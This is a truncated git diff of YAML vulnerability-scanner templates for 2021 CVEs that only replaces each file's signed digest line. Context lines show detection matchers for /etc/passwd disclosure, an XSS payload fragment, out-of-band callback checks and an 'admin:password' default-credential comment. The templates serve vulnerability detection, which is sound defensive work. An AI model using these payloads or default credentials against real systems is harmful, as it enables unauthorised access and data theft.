a/http/cves/2021/CVE-2021-30461.yaml b/http/cves/2021/CVE-2021-30461.yaml index 4c0742aa5f..e84522093d 100644 --- a/http/cves/2021/CVE-2021-30461.yaml +++ b/http/cves/2021/CVE-2021-30461.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205be3afa5e166bb60f492d734f2482484d4ad69393104a82b4a48b56682ec1826022100f14cf4f4f25a436f1c9a8df7e69804e2f6eb76231534db52d1a6c2c4b9e75d60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fc05eb717e7b84bb0bde4f0cccd8943c67d59f15011f279e75212a27698d53700220287c2e9a2a6415f33a7f5605dd777db2502d48c54a3d7c9b28acca223d0054df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-30497.yaml b/http/cves/2021/CVE-2021-30497.yaml index 629ef8ce82..0a1bb1edd4 100644 --- a/http/cves/2021/CVE-2021-30497.yaml +++ b/http/cves/2021/CVE-2021-30497.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203161ea5c26c4c512386e2efe937f9ae5b4d1450eee8b0a2d7c58cc7e6cb181c4022012d878b741870619e46248e6c0979e2defbed91775c861658417c3125cbdbb99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022033bf7deafca9f468fa82d9026d812227263f306a1953f992a6638e15279f7fd50221009d239e8a2fe3bcb99fcbb90deaa952eebfe62184020e007df4da29deeced730e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-3110.yaml b/http/cves/2021/CVE-2021-3110.yaml index 50ed6d0a55..556fd5a61d 100644 --- a/http/cves/2021/CVE-2021-3110.yaml +++ b/http/cves/2021/CVE-2021-3110.yaml @@ -47,4 +47,4 @@ http: - 'contains(content_type, "application/json")' - 'contains(body, "average_grade")' condition: and -# digest: 4a0a0047304502200c34a850d39fbeeddbc540d1d52ba9d67b8a5204578f8e85b7f4eb94e0afb1830221009b0894c1fc99cb6734f92c3f89d62c547c7a350f7e0f4c6b5edacd23e5a8ae19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204d4902f51f560fcf0ded1e355944479986a26099d29a7f3247c2c0a35fb533e402204b3ddd6af36676a8993b163161d15f67e560f97d3e61e4a0d1cd13004d189c64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-31195.yaml b/http/cves/2021/CVE-2021-31195.yaml index 6e19ed1bad..f951cbae8d 100644 --- a/http/cves/2021/CVE-2021-31195.yaml +++ b/http/cves/2021/CVE-2021-31195.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 500 -# digest: 4a0a00473045022100add3f33b9d2e9d57977208908f642566e5d796379120daba28b5ee7685d38b7702204fc9e494046fce48f88b428f7fc426ddca6906f03364c55c0ca03adc357c0660:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220636647297d4ef8ee4209bcdd8e9c628fadf1cbce433fc90c55a3610304409ddc022100a82da2af0c0b6fb1b2eeba56b7cf873e164f198d04e1301afd9c07ecfef0f726:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-31250.yaml b/http/cves/2021/CVE-2021-31250.yaml index 601045c4e4..fcab1361e6 100644 --- a/http/cves/2021/CVE-2021-31250.yaml +++ b/http/cves/2021/CVE-2021-31250.yaml @@ -49,4 +49,4 @@ http: part: body words: - '">' -# digest: 490a00463044022079123fdae879b637f0e9fb80ff3f14cd52ea536bb21973d4e6c42e424732e1a60220569e530531fa3d07ffc1a9a0b5e334557b3ef103999048a2f5b1dd3ff6d64376:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022001068e1ddaf3c98d6733d9d17ce3ca0f27152fa717d76ce4180805b2d3cbc1e0022100f9fea88e57be3c2358133f57b3ff53d4ecb3b4469d87698b45a12f487f25d320:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-31537.yaml b/http/cves/2021/CVE-2021-31537.yaml index e4529cfda9..13be6a198a 100644 --- a/http/cves/2021/CVE-2021-31537.yaml +++ b/http/cves/2021/CVE-2021-31537.yaml @@ -47,4 +47,4 @@ http: part: header words: - text/html -# digest: 490a0046304402204da43b60754d42852c0d693d43abcf91056309cafe0f417a0617d01a0f0ae6e502205bcbba054b716ae69bf7c9187fa6ff4c3ab2fb69bfe3a240d82721db8221ff5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022074fa2eefd54c49e067c7b03e4b63355d495e8731b2236215abe908c6373eb73d022100e598dcc890332b546006164d52e772f1f6e9fd9b51df9c4ba6496829000bd407:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-31581.yaml b/http/cves/2021/CVE-2021-31581.yaml index 381f4d02f1..ce5d890c14 100644 --- a/http/cves/2021/CVE-2021-31581.yaml +++ b/http/cves/2021/CVE-2021-31581.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c618c0c706f90ae263dca7f791eea7727f5208a02ff97a620dcdd3f48789bb41022100ae5d555a29e8c87d665ceaff0e8dae13667c2586e6402cb9b17e8e458f7dc467:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100868bee0b52a32c55d97ef8959cacd265327d13225dd86188eb66c861c5c873c10221008385fe865b3f5cffe619d475b76c6ce876664435a96f0e2f0344f269920271fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-31589.yaml b/http/cves/2021/CVE-2021-31589.yaml index a406109b52..1f9557aa0f 100644 --- a/http/cves/2021/CVE-2021-31589.yaml +++ b/http/cves/2021/CVE-2021-31589.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022068d41164ba855a2600f7fcfeb4d98a1ede131baf6cf5bae9be7f37e595bfe786022023c4b711bf8091b7d6c996aa06fc134a97a34eefab9dfeae693d6ac7e3061bd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008fc9ed93c6e938c96e612190d3b15c829dc82e6f16f8229c8387cfd205ab43770220660a35947ff68a217b4aaac34bbe7089f6da7f8dca0181606d0334b634330d21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-31602.yaml b/http/cves/2021/CVE-2021-31602.yaml index ae92682338..32e43a9ad0 100644 --- a/http/cves/2021/CVE-2021-31602.yaml +++ b/http/cves/2021/CVE-2021-31602.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b35315666af836eb0d1c0cb629dcaa9244de7f8bef62b0d942503cd51f77f79a02203a67df731f946a044f7dd7a2137b3fbcc76a48fd94edd78b8ef4ed6f2300d002:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008bc70d06d43fd8bdb3ad8f830ef19bf1b4849e1d1e5073789d8b9ed29881747a022100c53d6d51fbcfd7ee4ada2c36666e44148ff4ea26623f1ba33ad111633bf453ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-31682.yaml b/http/cves/2021/CVE-2021-31682.yaml index 571c3ad736..35b27b217d 100644 --- a/http/cves/2021/CVE-2021-31682.yaml +++ b/http/cves/2021/CVE-2021-31682.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022045824ff16ba16cb21de7b21e60ac029eb7fda55842dad99fc023a5ee7f91376e02201d497628c7f2ade3b6b6b9dcf46184a710305a6d3461abb2b4ef0e4d643ca3f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009ebcb1ee8c45888c514b32987b94795348c56e452ad1ad64486523b89e346e9802210088e879fcea852853cdf91ed44d993a35eaabe332f76cb7a52d7f62fce2955dd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-31755.yaml b/http/cves/2021/CVE-2021-31755.yaml index e14aefe39e..9985250851 100644 --- a/http/cves/2021/CVE-2021-31755.yaml +++ b/http/cves/2021/CVE-2021-31755.yaml @@ -45,4 +45,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a00473045022024dea9a3df7016acc7f7259f997886586c771dce081949605bfc5a966edd61ac022100dbed0c4ff5dca2ef9cc708946e75516b5994715572b6dbe6f3e4c8479cdb8c8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022066374cd3cba293cdd5323e654c3596af22de64979b1ef3962c344cae21d1894b0220685618efe4f4080e0f0b3d9e41d9088f6a1284e302fed371714148ae75bc0af0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-31805.yaml b/http/cves/2021/CVE-2021-31805.yaml index f1ee5ac188..7b1d9a38ef 100644 --- a/http/cves/2021/CVE-2021-31805.yaml +++ b/http/cves/2021/CVE-2021-31805.yaml @@ -61,4 +61,4 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 4a0a0047304502210099350b0b9e08a8c89bba1fb6dcfd7cc4a0a7a0220ffb6f74b0da393d51d218e90220480b82d744ec40d5ac5a7a57b6067c4579ba4fb210ad395f4b4a253cd802293c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022028bad9749b9ae4d945e0cde1a909d8f43e8fdb919b6f9a579fe65f9ab72b95ef022100e3abdfd25fa01e8d16246da58b8e0307af0381a5023cd306e574029b2fb13653:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-31862.yaml b/http/cves/2021/CVE-2021-31862.yaml index c45ee5267b..7cf739e84d 100644 --- a/http/cves/2021/CVE-2021-31862.yaml +++ b/http/cves/2021/CVE-2021-31862.yaml @@ -42,4 +42,4 @@ http: - '(body == "false ")' - 'status_code == 200' condition: and -# digest: 490a004630440220695d58cf0fd21f4c1d710467e6b21c1e233c8de8bafe4a76b86ee296c287fa2a02205bc6ca3e58157209e19f18fbea88fdb9fd57c43fc67a858599a23a5186cceec2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022038b8aeb034956bdc62b2cc0faf3b3b96c56487ef30a73cca3e5b4d7f7cc68e4e022100913143d230a19128c200ec72b3f3223614ba45b286c16c61e55e0afbf315b8d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-3223.yaml b/http/cves/2021/CVE-2021-3223.yaml index 35519a7591..996e0578de 100644 --- a/http/cves/2021/CVE-2021-3223.yaml +++ b/http/cves/2021/CVE-2021-3223.yaml @@ -51,4 +51,4 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 4a0a0047304502201018efcf4dfa0c313545ef9790e0659cb28de43d8e02fbd289666a7bd7fa02eb022100baa7210d4d9a2b15c8410c84b98b928a6b2db3f6591f6a64b1e7eb32144c7b6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022064d1be9f5d7a1bf3459780fa37e408c640727b9308a51f197ed5253618aaaadf02204ed66a55a7347bd65e48b20fc814433d92dc31b9bb2d36e63a278a3729fa4a74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-32618.yaml b/http/cves/2021/CVE-2021-32618.yaml index 804f0a137b..170c6b5bfd 100644 --- a/http/cves/2021/CVE-2021-32618.yaml +++ b/http/cves/2021/CVE-2021-32618.yaml @@ -39,4 +39,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 490a0046304402207acbef18aa0010bc58e52948c92c8959a2c354c33dc25185577d33bc3177847c0220208482a310a7fd0552de2030e8147b5a244bfed28dbb16a153d017b3f06bb690:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220084027159dc04a0080dc3d22736d90358ea48188ebfa9bd7018d6d6ec36462ac0220078903f4e6dc186c0ae1d8e2a3f3038986b197f958db5f7804e8a98d32b38bec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-32820.yaml b/http/cves/2021/CVE-2021-32820.yaml index 34558cc2fc..2ed28f8455 100644 --- a/http/cves/2021/CVE-2021-32820.yaml +++ b/http/cves/2021/CVE-2021-32820.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022069731ef6aa77f47e6209c6404ff6b4a5d8869413afa7d0197169a84bafb57ecc02203e27a5de4cb4ef4f62b3a78fddfdba82002813f1c55df47fcbbf83b0c7bf4da3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022047a0dfe26c2110b4bc702f0974b7c3b58a04fc16b64d066386db40b7fccf393702201743ed87b6aeef5e2d87a5720642eadcbd8e5e53f575da9c78a7b8095ffd7e8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-32853.yaml b/http/cves/2021/CVE-2021-32853.yaml index b74c2d40bb..92f9c6e0b7 100644 --- a/http/cves/2021/CVE-2021-32853.yaml +++ b/http/cves/2021/CVE-2021-32853.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207aed0ce8a782de56c716be549d8c4fa15f2cbf9113c348db56bdfc9910776782022100a891ca50a47ab7c7ce36f2e1498bb7e8f44b168bfecfb59396015929d2525eb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220710309b95468b537919c23f53d4fdcbed93b96ed7a9b7f29377c5c86b800a7ea02205b339a6fab958bf155c864134870b809b82b8b2067f3da69059a95282246238a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-3297.yaml b/http/cves/2021/CVE-2021-3297.yaml index d546ad9d09..c704090209 100644 --- a/http/cves/2021/CVE-2021-3297.yaml +++ b/http/cves/2021/CVE-2021-3297.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022063e3bd0343c282a0777ee7560b660fb802857d90d8db48f45a676f645bede369022100cbf65f25ecaeef1a1dfd59c493ad4d4286d2d866d00c53c917c2e47af040abee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ee5f7e81438bf8d3aabd4b47c6762f7c45460a951522e349bc56a583e773f4e002200e78e4a0df40af3b3df5b3ffb09e32e215f235ce9bed5b87ee013da38b5b92f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-33044.yaml b/http/cves/2021/CVE-2021-33044.yaml index 9ec63b51e9..a0af48ea0a 100644 --- a/http/cves/2021/CVE-2021-33044.yaml +++ b/http/cves/2021/CVE-2021-33044.yaml @@ -64,4 +64,4 @@ http: regex: - ',"result":true,"session":"([a-z]+)"\}' part: body -# digest: 4a0a00473045022100969dc816553940d4ba45200da238d7df4503480847dc4729f24dbeea283d51b302203e3bc11853da98fc6f17ca80f318604a3a94eb5fd28376a5c321efee7f7d1358:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e0608c5537bcf8b5dfaa512dd8755999f45853416be5f28fd5fe3d69d1cb0cdb02203c35616fdd4645b3cfabbc72041a76cd8838bfa9e167a07faf46f814791d4a20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-33221.yaml b/http/cves/2021/CVE-2021-33221.yaml index 788be4ab37..8b19800602 100644 --- a/http/cves/2021/CVE-2021-33221.yaml +++ b/http/cves/2021/CVE-2021-33221.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022040d9f901c377c371535d5eba601ba2641df74547f351de738a7d9b290daf6b90022042c17f7955d7e8c548d6ad429ee8db2ad8bfca849b19d888de7d37efc4a14b75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220291f1cccc0e37c2fece91d906c151b1f66670a14693b82913538315a518b1a1c0221009dc63c8ab40119cc74254446b822897f773fc4061eb2d09d8f6ebf4db3c1e52c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-33357.yaml b/http/cves/2021/CVE-2021-33357.yaml index e0d84db1c9..056fd0a4f9 100644 --- a/http/cves/2021/CVE-2021-33357.yaml +++ b/http/cves/2021/CVE-2021-33357.yaml @@ -54,4 +54,4 @@ http: regex: - 'GET \/([a-z-]+) HTTP' part: interactsh_request -# digest: 4b0a00483046022100a36fdff828bec618e9c78788bae9076907c04531b09578a93abe65de10f97b25022100a506a1278139dae39fbaa6f9678143001d0560355b56762dfce83af689ef65f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202cb8400b73367eea3c497924cc723246298a450a67aa13e58179baac950a78790221009ae4d2e958904481b39e84c2c0dab404f9888be12fcfe94328b861be0d13a8b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-33690.yaml b/http/cves/2021/CVE-2021-33690.yaml index a1e772d026..041384d150 100644 --- a/http/cves/2021/CVE-2021-33690.yaml +++ b/http/cves/2021/CVE-2021-33690.yaml @@ -50,4 +50,4 @@ http: part: body words: - "Could not connect to the CBS" -# digest: 490a00463044022027727d913e7044670a5cfc2a318a45aac111b189bee52347b9a90933cf5c801b022011d1873dee71de17c4f6b36800ac5b17f4129ced9b5bba0e86ef087c08c08dd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201b6ba3203b011324eb5d2ee382e3c671a635478858a9741f679d59e46179f8a3022100b58f6e6bbfa8bfe46dd8c9957f43eb2674510800e350f3db9b7f7c191719338a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-3374.yaml b/http/cves/2021/CVE-2021-3374.yaml index 3180a8af63..52634812a5 100644 --- a/http/cves/2021/CVE-2021-3374.yaml +++ b/http/cves/2021/CVE-2021-3374.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b1c465a83bf095eaab8ef309c15df15310aa6724bc213fa50af8c7323174d4da022100efa38cb1a731ed0c095c6017209cd82a727de7f44d25f48b8efaefbbab8721a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220092e3113d5b43405d049a5e6b91f805dbfce0484bc0a6cb3d1791bd10b636771022100d9ac7e9f7f5793de6f56a45088ac511ab88c7798a97df2cd015c7f282f0a40c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-3377.yaml b/http/cves/2021/CVE-2021-3377.yaml index 75ef34cecf..e47686872b 100644 --- a/http/cves/2021/CVE-2021-3377.yaml +++ b/http/cves/2021/CVE-2021-3377.yaml @@ -48,4 +48,4 @@ http: - type: word words: - "sh\"/onmouseover=\"alert(1)\">" -# digest: 490a0046304402200be98ecd1e9d686de76a80e1b6ba45a22113eba83e6af3420ff0a2c5f8e704cb0220421807456b96e3079452c53c16bc561a5906c0c939ece2763ade16a573e0acb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205c8639aeb3d9f40891d79f5e9810f3666015b266f3f9acf26a6526395b6be1a6022037577c58f45cb199e564690d2312d2ae86d41396ce8b5b54eb1d5765409913d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-33807.yaml b/http/cves/2021/CVE-2021-33807.yaml index 1254618934..e0177f8d21 100644 --- a/http/cves/2021/CVE-2021-33807.yaml +++ b/http/cves/2021/CVE-2021-33807.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210081ba553c292e57848a13e7ec65c8dec5a15b83b70c930746bfab4dbcd266287702203de6c624da037776f85ee134ccaaec236dd1bef707915e944cfe6731006bb29b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220422b7249efee552751068637592f33a59d0dc7fb1a142d2b029df7fb29dff78b022100d24ab853d986ecf1b4d3f370e664cbb373bdbae73195d2c12837ccd95bd26fe4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-33851.yaml b/http/cves/2021/CVE-2021-33851.yaml index d52387d771..1c3ea0477f 100644 --- a/http/cves/2021/CVE-2021-33851.yaml +++ b/http/cves/2021/CVE-2021-33851.yaml @@ -69,4 +69,4 @@ http: - 'name="_wpnonce" value="([0-9a-zA-Z]+)"' internal: true part: body -# digest: 490a004630440220098b618e64216cc6e575a474182053eae704f5b3d91f98e7851d52a79480d57002207755a534f0e8813a54b102ebe3fb5b8a4f145c17ff32468ab7f25305f3536832:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ee6ab3b69138a8e84897affeb28b29579b1f3cfe2a2bdfae09b5456f3ad596c302201e0983cbf5b5ba6b52776246e97aa767c10ff3e5adbb79bf066ca7f6b9be6d01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-33904.yaml b/http/cves/2021/CVE-2021-33904.yaml index e3e8e65858..df569fc48d 100644 --- a/http/cves/2021/CVE-2021-33904.yaml +++ b/http/cves/2021/CVE-2021-33904.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a95bda837d8b3972b0cfccf95320c0e041709f4cff91ea1ce8e061322f58c92e022100c14bcebdc61fb62d8cd5a7392dd3d5350a3aff7a740c0b1b270eebe6d48999ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220598ca0ea5a2191920903252d65a78b48659212316cb65eee6ae478d701b4189402203a1af1fd2ed527efa2b5d22b4d5183ea84c0d41b226d4b7f0e76f2c6a9180682:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-34429.yaml b/http/cves/2021/CVE-2021-34429.yaml index ee42609eb1..00b357a12f 100644 --- a/http/cves/2021/CVE-2021-34429.yaml +++ b/http/cves/2021/CVE-2021-34429.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bd58c1d099476379c284c800fdff4ff7fb04548ad586e31004eb4f4572dad96b02205e568d1598ba3e2de032422dcb82f910c03c98ec68ccee39ac684be4f30c6fd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205110e2fbe84ad592a19a1af3bc02e4e00ecd6ff2af58949be44098ef4d10a302022100afb9dd560fd642bed820e4432dfe272f0bb5b85723b727bb1b63aafc4ccfac9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-34473.yaml b/http/cves/2021/CVE-2021-34473.yaml index 9cdf5d3cbc..0eb4aee6b5 100644 --- a/http/cves/2021/CVE-2021-34473.yaml +++ b/http/cves/2021/CVE-2021-34473.yaml @@ -45,4 +45,4 @@ http: - "Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException" - "Exchange MAPI/HTTP Connectivity Endpoint" condition: or -# digest: 4a0a0047304502201b1af120ec090b8ce24a896b622e97f0cac87382b79a5e59e1e9d581099e6d7a022100c51af8c078f10d5837821287b2fcc3f013e3cd4f684ce1b3c9009a552bb36138:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a05e71e316d5e5706b9faae16b076bdd8ba52969ad1a907f409494b8ceb0f3c002202f939aad5ecfa6df83bc6e2d8876dbc1895c9452ffe5d9adc04d4b8046ad467c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-34640.yaml b/http/cves/2021/CVE-2021-34640.yaml index 579b5f4fe4..2d81d7d801 100644 --- a/http/cves/2021/CVE-2021-34640.yaml +++ b/http/cves/2021/CVE-2021-34640.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f71f4027e35181f2336f1a5f0c7fa04fd40c25ca4ea1749124253649571d1d09022100a95ccf3acc3d6ad779d55f0e9ae4ce0735927cbfd3a5aa7f9b2350c68169ee4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206a676e39b2690c7e26cca451b4f1feb6d23bec0fab9effbc62fbb7016ecc40780221008c0dc99efccc261337ce7b66c9d47d89c7ebac18417986ab613b831e69f9dbf5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-34643.yaml b/http/cves/2021/CVE-2021-34643.yaml index edb34639c5..caa6026fa8 100644 --- a/http/cves/2021/CVE-2021-34643.yaml +++ b/http/cves/2021/CVE-2021-34643.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206d3a11c0c355a2d754828a3bf9cb67c195bd89e335c164e6c70ff16f69226d9202202f501c665407d0e31660af7d953a8a91410f52a5b28a21f28bf895b7b18f7977:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220656c943777caaecec9019917bab9f2d5f5954fc0b15708a89a278c011b3759cc022100bb6fb748c9e4c0d37afddd40d7052ab11269574ad4330ded5792ed8670462d0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-34805.yaml b/http/cves/2021/CVE-2021-34805.yaml index 7d19335562..240572e049 100644 --- a/http/cves/2021/CVE-2021-34805.yaml +++ b/http/cves/2021/CVE-2021-34805.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220483d18d13b339bce1072f55780e09412873fbc11be357967dfd8c3168bda3bc80221009cd68fbbedfa7f4c6bfe9543021f624b8a94c3ed938791eb9f7c7ffb2daebb88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022017d1e86d37ee6e04168a971d50a0b0df88a1d77e3148132137d881aaacaf315702204ae97b6c577d162e884706526b862a7ab0be81ad50c898d49fa9cbe162c31e76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-35250.yaml b/http/cves/2021/CVE-2021-35250.yaml index 824eabf5ff..60fdac9283 100644 --- a/http/cves/2021/CVE-2021-35250.yaml +++ b/http/cves/2021/CVE-2021-35250.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 401 -# digest: 490a0046304402200620000d186c36d678271b33d3f8ab02fa3ece06cd95c0344ba841a95c9659f802201309537d97e91561f1fd81ac4850c36eca8c4bf67806545f58635619957ea31a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bce1f617ac227ba0837acb023dea78f11fbd4f6a484ac4c589f4df2f8ece918c0220311c324b5779561a9c5f3a0981e3cd3993d4fae347ceee717a4c7c646fbfa21a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-35265.yaml b/http/cves/2021/CVE-2021-35265.yaml index 9f273821c2..05474adf1f 100644 --- a/http/cves/2021/CVE-2021-35265.yaml +++ b/http/cves/2021/CVE-2021-35265.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e9c214b01c6e7d86492788140807064441cd148338038cbab30021c0d8492ef202202fee55bfa22008c45b8096aedbcbb99a19021b8b9794c77311b87645ff04cca1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a3ec396f8fd2b09a35def8176981fdae597025b6868c35b6c48b4522801b6d010220412b41c23251d8c2d7eba6177e500fdb0c784afbf180103bcdd059bdd2623f1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-35336.yaml b/http/cves/2021/CVE-2021-35336.yaml index a3a2c59b8f..20750834b2 100644 --- a/http/cves/2021/CVE-2021-35336.yaml +++ b/http/cves/2021/CVE-2021-35336.yaml @@ -55,4 +55,4 @@ http: - 200 # admin:password -# digest: 4a0a00473045022100c5971cc683938cd5ccc1d2b6f56c1c2e6b4be1423d7d682586326e7ced627fb002201cbaba9a7838eab21d7dae0dbe8582f084e0fad966c90ec30731787e015a7abd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e29bf2b0a9e4a83431c44d3ab6d77ed7672eb26989cb04fb571bdd0d63bad413022021925ffb5cd4853176a9c5dc7536ac12564976b0e5f91fc91a6111b59de41008:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-35395.yaml b/http/cves/2021/CVE-2021-35395.yaml index ec4e437cda..468c79602d 100644 --- a/http/cves/2021/CVE-2021-35395.yaml +++ b/http/cves/2021/CVE-2021-35395.yaml @@ -46,4 +46,4 @@ http: part: interactsh_request words: - "User-Agent: curl" -# digest: 4a0a0047304502200f282350954f899ddbf62874c49a1c8297dfe332dae61b46c09d5fce43904bf4022100861f33e914b3543cccbec18fe3c283f7a6a028d5f52c9691c9f397c000c41ddd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205aa3a24fd1ef024bbc3be505adb2ec487d1063c810e6b96e8f8cc305b73a6495022100e4bdbecabffee2fce2a6f73cd37f414cf32755981c97deaa1a14ad7922b2d013:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-35464.yaml b/http/cves/2021/CVE-2021-35464.yaml index 